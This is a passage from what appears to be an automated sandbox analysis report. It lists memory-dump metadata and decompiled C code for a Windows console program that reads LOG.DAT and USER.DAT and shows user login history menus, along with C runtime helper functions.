                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Once$ExecuteInit__ioinit
                                                                      • String ID:
                                                                      • API String ID: 129814473-0
                                                                      • Opcode ID: d9d38c329a40a4caa3362b90e704a58bf015394371171dd4890ef3e316bf4928
                                                                      • Instruction ID: e30547c7261321678209ec455157081143a0936336451dfa374e6e3aa73479c0
                                                                      • Opcode Fuzzy Hash: d9d38c329a40a4caa3362b90e704a58bf015394371171dd4890ef3e316bf4928
                                                                      • Instruction Fuzzy Hash: 7A411271504B849FD7289B7AC892E7B77E4DF45320B248BADE4AA873D2DB74D8408B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E00BF1D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                      				void* _t7;
                                                                      				long _t8;
                                                                      				intOrPtr* _t9;
                                                                      				intOrPtr* _t12;
                                                                      				long _t20;
                                                                      				long _t31;
                                                                      
                                                                      				if(_a4 != 0) {
                                                                      					_t31 = _a8;
                                                                      					__eflags = _t31;
                                                                      					if(_t31 != 0) {
                                                                      						_push(__ebx);
                                                                      						while(1) {
                                                                      							__eflags = _t31 - 0xffffffe0;
                                                                      							if(_t31 > 0xffffffe0) {
                                                                      								break;
                                                                      							}
                                                                      							__eflags = _t31;
                                                                      							if(_t31 == 0) {
                                                                      								_t31 = _t31 + 1;
                                                                      								__eflags = _t31;
                                                                      							}
                                                                      							_t7 = HeapReAlloc( *0xc02a68, 0, _a4, _t31);
                                                                      							_t20 = _t7;
                                                                      							__eflags = _t20;
                                                                      							if(_t20 != 0) {
                                                                      								L17:
                                                                      								_t8 = _t20;
                                                                      							} else {
                                                                      								__eflags =  *0xc02a64 - _t7;
                                                                      								if(__eflags == 0) {
                                                                      									_t9 = E00BE8EFF(__eflags);
                                                                      									 *_t9 = E00BE8F12(GetLastError());
                                                                      									goto L17;
                                                                      								} else {
                                                                      									__eflags = E00BEC6EE(_t7, _t31);
                                                                      									if(__eflags == 0) {
                                                                      										_t12 = E00BE8EFF(__eflags);
                                                                      										 *_t12 = E00BE8F12(GetLastError());
                                                                      										L12:
                                                                      										_t8 = 0;
                                                                      										__eflags = 0;
                                                                      									} else {
                                                                      										continue;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						E00BEC6EE(_t6, _t31);
                                                                      						 *((intOrPtr*)(E00BE8EFF(__eflags))) = 0xc;
                                                                      						goto L12;
                                                                      					} else {
                                                                      						E00BE8F53(_a4);
                                                                      						_t8 = 0;
                                                                      					}
                                                                      					L14:
                                                                      					return _t8;
                                                                      				} else {
                                                                      					return E00BE77C5(__ebx, __edx, __edi, _a8);
                                                                      				}
                                                                      			}









                                                                      0x00bf1d2d
                                                                      0x00bf1d3b
                                                                      0x00bf1d3e
                                                                      0x00bf1d40
                                                                      0x00bf1d4f
                                                                      0x00bf1d82
                                                                      0x00bf1d82
                                                                      0x00bf1d85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1d52
                                                                      0x00bf1d54
                                                                      0x00bf1d56
                                                                      0x00bf1d56
                                                                      0x00bf1d56
                                                                      0x00bf1d63
                                                                      0x00bf1d69
                                                                      0x00bf1d6b
                                                                      0x00bf1d6d
                                                                      0x00bf1dcd
                                                                      0x00bf1dcd
                                                                      0x00bf1d6f
                                                                      0x00bf1d6f
                                                                      0x00bf1d75
                                                                      0x00bf1db7
                                                                      0x00bf1dcb
                                                                      0x00000000
                                                                      0x00bf1d77
                                                                      0x00bf1d7e
                                                                      0x00bf1d80
                                                                      0x00bf1d9f
                                                                      0x00bf1db3
                                                                      0x00bf1d99
                                                                      0x00bf1d99
                                                                      0x00bf1d99
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bf1d80
                                                                      0x00bf1d75
                                                                      0x00000000
                                                                      0x00bf1d9b
                                                                      0x00bf1d88
                                                                      0x00bf1d93
                                                                      0x00000000
                                                                      0x00bf1d42
                                                                      0x00bf1d45
                                                                      0x00bf1d4b
                                                                      0x00bf1d4b
                                                                      0x00bf1d9c
                                                                      0x00bf1d9e
                                                                      0x00bf1d2f
                                                                      0x00bf1d39
                                                                      0x00bf1d39

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF1D32
                                                                        • Part of subcall function 00BE77C5: __FF_MSGBANNER.LIBCMT ref: 00BE77DC
                                                                        • Part of subcall function 00BE77C5: __NMSG_WRITE.LIBCMT ref: 00BE77E3
                                                                        • Part of subcall function 00BE77C5: HeapAlloc.KERNEL32(011F0000,00000000,00000001,00000000,00000000,00000000,?,00BEC5BB,00000000,00000000,00000000,00000000,?,00BEBF28,00000018,00BFD900), ref: 00BE7808
                                                                      • _free.LIBCMT ref: 00BF1D45
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AllocHeap_free_malloc
                                                                      • String ID:
                                                                      • API String ID: 2734353464-0
                                                                      • Opcode ID: 62a3c8c18ecc3ec75da1cc60553dc75c103e61240e830e1d77825451b07ba237
                                                                      • Instruction ID: f364da9aaa72c9275b2584bd21f8d663178f04c0b321dcb86f482f219fdc2527
                                                                      • Opcode Fuzzy Hash: 62a3c8c18ecc3ec75da1cc60553dc75c103e61240e830e1d77825451b07ba237
                                                                      • Instruction Fuzzy Hash: 1511C136504619EFCB253F7DAC04A7A3BE99F04360B104CB5FA099B1A1DF3489489790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00BE860D
                                                                        • Part of subcall function 00BEE840: __87except.LIBCMT ref: 00BEE87B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: 6d96d960c5c786e2777006d6ffed34b07fc2ebe0b56def37530e25f916f06293
                                                                      • Instruction ID: 1cecb34d9118640753a1d4653572143da076cda970e019edcdc130bd542b5e1a
                                                                      • Opcode Fuzzy Hash: 6d96d960c5c786e2777006d6ffed34b07fc2ebe0b56def37530e25f916f06293
                                                                      • Instruction Fuzzy Hash: 88518E24A08AC5CACB117B16CA4137E2BD4EB50711F204DE9E4ED432EAEF35CCD4DA46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00BE347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				intOrPtr _t218;
                                                                      				void* _t228;
                                                                      				void* _t249;
                                                                      				void* _t270;
                                                                      				void* _t283;
                                                                      				void* _t287;
                                                                      				void* _t306;
                                                                      				intOrPtr _t307;
                                                                      				void* _t309;
                                                                      				intOrPtr _t310;
                                                                      				void* _t313;
                                                                      				void* _t314;
                                                                      				intOrPtr _t320;
                                                                      				void* _t336;
                                                                      				intOrPtr _t364;
                                                                      				void* _t371;
                                                                      				intOrPtr _t394;
                                                                      				void* _t397;
                                                                      				void* _t421;
                                                                      				void* _t433;
                                                                      				void* _t435;
                                                                      				void* _t436;
                                                                      				void* _t437;
                                                                      				void* _t442;
                                                                      				void* _t443;
                                                                      				void* _t446;
                                                                      				void* _t448;
                                                                      				void* _t450;
                                                                      				void* _t451;
                                                                      				void* _t457;
                                                                      
                                                                      				L0:
                                                                      				while(1) {
                                                                      					L0:
                                                                      					_t457 = __fp0;
                                                                      					_t421 = __esi;
                                                                      					_t397 = __edi;
                                                                      					_t314 = __ebx;
                                                                      					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                                      					while(1) {
                                                                      						L69:
                                                                      						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      						if(__eflags < 0) {
                                                                      						}
                                                                      						L70:
                                                                      						E00BE12B0(5,  *(_t433 - 0xc) + 0xa);
                                                                      						_push(1 +  *(_t433 - 8));
                                                                      						_push("%d.");
                                                                      						E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                                      						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                                      						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                                      						_t270 = E00BE82C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                                      						_t448 = _t435 + 0xc;
                                                                      						__eflags = _t270 - 0xa;
                                                                      						if(__eflags < 0) {
                                                                      							_t336 =  *(_t433 - 8) * 0x45;
                                                                      							__eflags = _t336;
                                                                      							_t185 = _t336 + 0x22; // 0x23
                                                                      							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                                      							E00BE16A0(_t397, _t421, _t457);
                                                                      						}
                                                                      						L72:
                                                                      						E00BE12B0(9,  *(_t433 - 0xc) + 0xa);
                                                                      						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                                      						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                                      						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                                      						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                                      						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                                      						_push("%s\t\t%s\t%s\t\t%s");
                                                                      						E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      						_t435 = _t448 + 0x14;
                                                                      						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                                      						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                                      							L74:
                                                                      							goto L0;
                                                                      						} else {
                                                                      							L73:
                                                                      							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                                      						}
                                                                      						L75:
                                                                      						_t322 =  *((char*)(_t433 - 1));
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                                      						if( *((char*)(_t433 - 1)) == 0x53) {
                                                                      							L77:
                                                                      							 *(_t433 - 0x34) = 1;
                                                                      						} else {
                                                                      							L76:
                                                                      							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                                      							if( *((char*)(_t433 - 1)) == 0x73) {
                                                                      								goto L77;
                                                                      							}
                                                                      						}
                                                                      						L78:
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                                      						if( *((char*)(_t433 - 1)) == 0x20) {
                                                                      							_t322 =  *(_t433 - 8);
                                                                      							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                                      								 *(_t433 - 0x1c) = 0;
                                                                      							}
                                                                      						}
                                                                      						L81:
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                                      						if(__eflags == 0) {
                                                                      							L50:
                                                                      							E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      							__eflags =  *(_t433 - 0x14) - 0xc;
                                                                      							if(__eflags >= 0) {
                                                                      								E00BE12B0(0xf, 0x15);
                                                                      								_push("Press SPACE BAR to view more data");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t446 = _t435 + 4;
                                                                      							} else {
                                                                      								E00BE12B0(8, 0x15);
                                                                      								_push("Press S to toggle Sorting between ascending or descending order.");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t446 = _t435 + 4;
                                                                      							}
                                                                      							L53:
                                                                      							E00BE12B0(5, 8);
                                                                      							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t435 = _t446 + 4;
                                                                      							E00BE12B0(4, 9);
                                                                      							 *(_t433 - 8) = 0;
                                                                      							while(1) {
                                                                      								L55:
                                                                      								__eflags =  *(_t433 - 8) - 0x46;
                                                                      								if(__eflags >= 0) {
                                                                      									break;
                                                                      								}
                                                                      								L56:
                                                                      								_push(0xc4);
                                                                      								_push("%c");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t435 = _t435 + 8;
                                                                      								L54:
                                                                      								_t287 = 1 +  *(_t433 - 8);
                                                                      								__eflags = _t287;
                                                                      								 *(_t433 - 8) = _t287;
                                                                      							}
                                                                      							L57:
                                                                      							__eflags =  *(_t433 - 0x34);
                                                                      							if( *(_t433 - 0x34) != 0) {
                                                                      								L58:
                                                                      								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                                      								while(1) {
                                                                      									L60:
                                                                      									__eflags =  *(_t433 - 8);
                                                                      									if( *(_t433 - 8) < 0) {
                                                                      										break;
                                                                      									}
                                                                      									L61:
                                                                      									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                                      									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                                      									_t435 = _t435 + 0xc;
                                                                      									_t397 = _t421 + 0x22;
                                                                      									asm("movsb");
                                                                      									L59:
                                                                      									_t371 =  *(_t433 - 8) - 1;
                                                                      									__eflags = _t371;
                                                                      									 *(_t433 - 8) = _t371;
                                                                      								}
                                                                      								L62:
                                                                      								 *(_t433 - 8) = 0;
                                                                      								while(1) {
                                                                      									L64:
                                                                      									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                                      										goto L66;
                                                                      									}
                                                                      									L65:
                                                                      									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                                      									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      									_t435 = _t435 + 0xc;
                                                                      									_t397 = _t421 + 0x22;
                                                                      									asm("movsb");
                                                                      									L63:
                                                                      									_t283 = 1 +  *(_t433 - 8);
                                                                      									__eflags = _t283;
                                                                      									 *(_t433 - 8) = _t283;
                                                                      								}
                                                                      							}
                                                                      							L66:
                                                                      							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                                      							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                                      								 *(_t433 - 0x1c) = 0;
                                                                      							}
                                                                      							L68:
                                                                      							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                                      							 *(_t433 - 0xc) = 0;
                                                                      							L69:
                                                                      							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      							if(__eflags < 0) {
                                                                      							}
                                                                      							goto L75;
                                                                      						}
                                                                      						L82:
                                                                      						_t249 =  *((char*)(_t433 - 1));
                                                                      						__eflags = _t249 - 0x73;
                                                                      						if(__eflags == 0) {
                                                                      							goto L50;
                                                                      						}
                                                                      						L83:
                                                                      						_t322 =  *((char*)(_t433 - 1));
                                                                      						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                                      						if(__eflags == 0) {
                                                                      							goto L50;
                                                                      						}
                                                                      						L84:
                                                                      						while(1) {
                                                                      							L86:
                                                                      							__eflags = 1;
                                                                      							if(1 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							L1:
                                                                      							 *(_t433 - 8) = 0;
                                                                      							 *(_t433 - 0x28) = 0;
                                                                      							 *(_t433 - 0x1c) = 0;
                                                                      							 *(_t433 - 0x34) = 0;
                                                                      							_t218 = E00BE6EF1("LOG.DAT", "r");
                                                                      							_t436 = _t435 + 8;
                                                                      							 *0xc02f20 = _t218;
                                                                      							while(1) {
                                                                      								L2:
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                                      								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                                      								_t320 =  *0xc02f20; // 0x0
                                                                      								_t228 = E00BE7021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                                      								_t437 = _t436 + 0x18;
                                                                      								if(_t228 == 0xffffffff) {
                                                                      									break;
                                                                      								}
                                                                      								L3:
                                                                      								_t307 = E00BE6EF1("USER.DAT", "r");
                                                                      								_t450 = _t437 + 8;
                                                                      								 *0xc02f28 = _t307;
                                                                      								while(1) {
                                                                      									L4:
                                                                      									_push(_t433 - 0x78);
                                                                      									_push(_t433 - 0x58);
                                                                      									_t394 =  *0xc02f28; // 0x0
                                                                      									_t309 = E00BE7021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                                      									_t451 = _t450 + 0x14;
                                                                      									if(_t309 == 0xffffffff) {
                                                                      										break;
                                                                      									}
                                                                      									L5:
                                                                      									_t313 = E00BE8230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                                      									_t450 = _t451 + 8;
                                                                      									if(_t313 == 0) {
                                                                      										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                                      									}
                                                                      								}
                                                                      								L8:
                                                                      								_t310 =  *0xc02f28; // 0x0
                                                                      								_push(_t310);
                                                                      								E00BE6DB6(_t314, _t397, _t421, __eflags);
                                                                      								_t436 = _t451 + 4;
                                                                      							}
                                                                      							L9:
                                                                      							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                                      							_t364 =  *0xc02f20; // 0x0
                                                                      							_push(_t364);
                                                                      							E00BE6DB6(_t314, _t397, _t421, __eflags);
                                                                      							E00BE20E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                                      							E00BE12B0(0x1e, 8);
                                                                      							_push("1. View by USER NAME");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xa);
                                                                      							_push("2. View by DATE");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xc);
                                                                      							_push("3. View ALL User history");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							E00BE12B0(0x1e, 0xe);
                                                                      							_push("4. Return to main menu");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t442 = _t437 + 0x14;
                                                                      							E00BE12B0(1, 0xf);
                                                                      							 *(_t433 - 8) = 0;
                                                                      							while(1) {
                                                                      								L11:
                                                                      								__eflags =  *(_t433 - 8) - 0x4e;
                                                                      								if(__eflags >= 0) {
                                                                      									break;
                                                                      								}
                                                                      								L12:
                                                                      								_push("_");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t442 = _t442 + 4;
                                                                      								_t306 = 1 +  *(_t433 - 8);
                                                                      								__eflags = _t306;
                                                                      								 *(_t433 - 8) = _t306;
                                                                      							}
                                                                      							L13:
                                                                      							E00BE12B0(0x17, 0x11);
                                                                      							_push(" Press a number between the range [1 -4]  ");
                                                                      							E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      							_t443 = _t442 + 4;
                                                                      							 *(_t433 - 0xc) = 0;
                                                                      							_t322 =  *(_t433 - 0xc);
                                                                      							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                                      							E00BE20E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                                      							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                                      							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                                      							__eflags =  *(_t433 - 0x20) - 3;
                                                                      							if(__eflags > 0) {
                                                                      								L38:
                                                                      								E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      								E00BE12B0(0xa, 0xa);
                                                                      								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                                      								E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								E00BE12B0(0xf, 0xc);
                                                                      								_push("Press ENTER to return to main menu...");
                                                                      								_t249 = E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      								_t435 = _t443 + 8;
                                                                      								 *(_t433 - 0x28) = 1;
                                                                      								goto L39;
                                                                      							} else {
                                                                      								L14:
                                                                      								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M00BE35F8))) {
                                                                      									case 0:
                                                                      										L15:
                                                                      										E00BE12B0(0x1e, 0xa);
                                                                      										_push("Enter user name : ");
                                                                      										E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      										_t365 = _t433 - 0x58;
                                                                      										_t249 = E00BE738B(" %s", _t433 - 0x58);
                                                                      										_t435 = _t443 + 0xc;
                                                                      										 *(_t433 - 8) = 0;
                                                                      										while(1) {
                                                                      											L17:
                                                                      											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                                      											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                                      												break;
                                                                      											}
                                                                      											L18:
                                                                      											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                                      											_t299 = E00BE8230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                                      											_t435 = _t435 + 8;
                                                                      											__eflags = _t299;
                                                                      											if(_t299 == 0) {
                                                                      												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                                      												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                                      												_t435 = _t435 + 0xc;
                                                                      												_t397 = _t421 + 0x22;
                                                                      												asm("movsb");
                                                                      												_t303 = 1 +  *(_t433 - 0xc);
                                                                      												__eflags = _t303;
                                                                      												 *(_t433 - 0xc) = _t303;
                                                                      											}
                                                                      											_t249 = 1 +  *(_t433 - 8);
                                                                      											__eflags = _t249;
                                                                      											 *(_t433 - 8) = _t249;
                                                                      										}
                                                                      										L21:
                                                                      										_t322 =  *(_t433 - 0xc);
                                                                      										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                                      										goto L39;
                                                                      									case 1:
                                                                      										do {
                                                                      											L22:
                                                                      											__eax = E00BE12B0(0x1e, 0xa);
                                                                      											_push("Enter Date (dd/mm/yyyy) : ");
                                                                      											__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      											__esp = __esp + 4;
                                                                      											__edx = __ebp - 0x58;
                                                                      											E00BE738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                                      											__eflags = E00BE1E60(__eflags, __ebp - 0x58);
                                                                      											if(__eflags == 0) {
                                                                      												__eax = E00BE1500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                                      												_push(0xbff8b0);
                                                                      												__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      												__esp = __esp + 4;
                                                                      											}
                                                                      											__ecx = __ebp - 0x58;
                                                                      											__eflags = E00BE1E60(__eflags, __ebp - 0x58);
                                                                      										} while (__eflags == 0);
                                                                      										__edx = __ebp - 0x58;
                                                                      										_push(__ebp - 0x58);
                                                                      										__eax = E00BE15D0();
                                                                      										 *(__ebp - 8) = 0;
                                                                      										 *(__ebp - 0xc) = 0;
                                                                      										while(1) {
                                                                      											L27:
                                                                      											__ecx =  *(__ebp - 8);
                                                                      											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                                      											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                                      												break;
                                                                      											}
                                                                      											L28:
                                                                      											__edx = __ebp - 0x58;
                                                                      											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      											__ecx =  *(__ebp - 0x18);
                                                                      											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                                      											__eax = E00BE8230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                                      											__eflags = __eax;
                                                                      											if(__eax == 0) {
                                                                      												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                                      												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                                      												__ecx = 0x11;
                                                                      												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                                      												__edi = __esi + __ecx;
                                                                      												__edi = __esi + __ecx + __ecx;
                                                                      												__ecx = 0;
                                                                      												asm("movsb");
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												__eax = 1 +  *(__ebp - 0xc);
                                                                      												__eflags = __eax;
                                                                      												 *(__ebp - 0xc) = __eax;
                                                                      											}
                                                                      											__eax =  *(__ebp - 8);
                                                                      											__eax = 1 +  *(__ebp - 8);
                                                                      											__eflags = __eax;
                                                                      											 *(__ebp - 8) = __eax;
                                                                      										}
                                                                      										L31:
                                                                      										__ecx =  *(__ebp - 0xc);
                                                                      										 *(__ebp - 0x14) = __ecx;
                                                                      										goto L39;
                                                                      									case 2:
                                                                      										L32:
                                                                      										 *(__ebp - 8) = 0;
                                                                      										while(1) {
                                                                      											L34:
                                                                      											__eax =  *(__ebp - 8);
                                                                      											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                                      											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                                      												break;
                                                                      											}
                                                                      											L35:
                                                                      											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                                      											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                                      											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                                      											__ecx = 0x11;
                                                                      											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                                      											__edi = __esi + __ecx;
                                                                      											__edi = __esi + __ecx + __ecx;
                                                                      											__ecx = 0;
                                                                      											asm("movsb");
                                                                      											__ecx =  *(__ebp - 0xc);
                                                                      											__ecx = 1 +  *(__ebp - 0xc);
                                                                      											 *(__ebp - 0xc) = __ecx;
                                                                      											__edx =  *(__ebp - 8);
                                                                      											__edx = 1 +  *(__ebp - 8);
                                                                      											__eflags = __edx;
                                                                      											 *(__ebp - 8) = __edx;
                                                                      										}
                                                                      										L36:
                                                                      										__edx =  *(__ebp - 0xc);
                                                                      										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                                      										L39:
                                                                      										__eflags =  *(_t433 - 0x14);
                                                                      										if(__eflags == 0) {
                                                                      											E00BE20E0(_t322, _t397, _t421, __eflags, _t457);
                                                                      											E00BE12B0(0x1b, 0xc);
                                                                      											_push(0xbff918);
                                                                      											E00BE715C(_t314, _t397, _t421, __eflags);
                                                                      											_t435 = _t435 + 4;
                                                                      											_t249 = E00BE2E80(_t314, _t365, __eflags, _t457);
                                                                      										}
                                                                      										__eflags =  *(_t433 - 0x28);
                                                                      										if( *(_t433 - 0x28) != 0) {
                                                                      											L85:
                                                                      											 *(_t433 - 0x28) = 0;
                                                                      										} else {
                                                                      											L42:
                                                                      											 *(_t433 - 8) = 0;
                                                                      											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                                      											while(1) {
                                                                      												L44:
                                                                      												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                                      												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                                      													break;
                                                                      												}
                                                                      												L45:
